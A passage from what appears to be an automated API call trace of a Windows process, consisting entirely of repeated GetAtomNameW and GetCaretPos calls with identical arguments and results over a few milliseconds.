returned 1 [0159.356] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.356] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.356] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.356] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.356] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.356] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.356] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.356] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.356] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.356] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.356] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.357] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.357] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.357] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.357] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.357] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.357] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.357] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.357] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.357] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.357] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.357] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.357] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.357] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.357] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.357] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.357] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.357] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.357] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.357] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.358] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.358] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.358] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.358] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.358] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.358] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.358] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.358] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.358] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.358] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.358] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.358] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.358] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.358] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.358] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.358] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.358] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.358] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.358] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.358] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.358] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.359] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.359] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.359] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.359] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.359] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.359] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.359] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.359] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.359] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.359] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.359] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.359] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.359] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.359] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.359] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.359] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.359] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.359] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.359] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.359] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.359] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.359] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.360] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.360] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.360] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.360] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.360] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.360] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.360] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.360] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.360] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.360] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.360] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.360] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.360] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.360] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.360] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.360] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.360] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.360] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.360] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.361] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.361] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.361] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.361] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.361] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.361] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.361] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.361] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.361] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.361] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.361] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.361] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.361] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.361] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.361] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.361] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.361] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.361] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.362] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.362] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.362] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.362] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.362] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.362] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.362] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.362] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.362] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.362] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.362] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.362] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.362] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.362] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.362] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.362] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.362] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.362] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.362] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.362] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.362] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.362] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.363] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.363] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.363] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.363] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.363] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.363] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.363] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.363] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.363] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.363] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.363] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.363] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.363] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.363] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.363] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.363] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.363] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.363] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.363] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.363] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.363] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.364] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.364] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.364] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.364] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.364] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.364] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.364] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.364] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.364] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.364] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.364] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.364] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.364] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.364] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.364] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.364] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.364] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.364] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.364] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.364] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.364] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.365] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.365] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.365] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.365] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.365] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.365] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.365] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.365] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.365] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.365] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.365] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.365] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.365] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.366] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.366] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.366] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.366] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.366] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.366] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.366] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.366] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.366] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.366] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.366] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.366] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.366] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.366] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.366] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.366] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.366] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.366] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.366] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.366] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.366] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.366] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.367] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.367] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.367] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.367] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.367] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.367] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.367] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.367] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.367] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.367] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.367] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.367] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.367] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.367] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.367] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.367] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.367] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.367] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.367] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.368] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.368] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.368] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.368] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.368] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.368] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.368] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.368] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.368] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.368] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.368] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.368] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.368] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.368] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.368] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.368] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.368] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.368] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.368] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.368] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.368] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.369] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.369] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 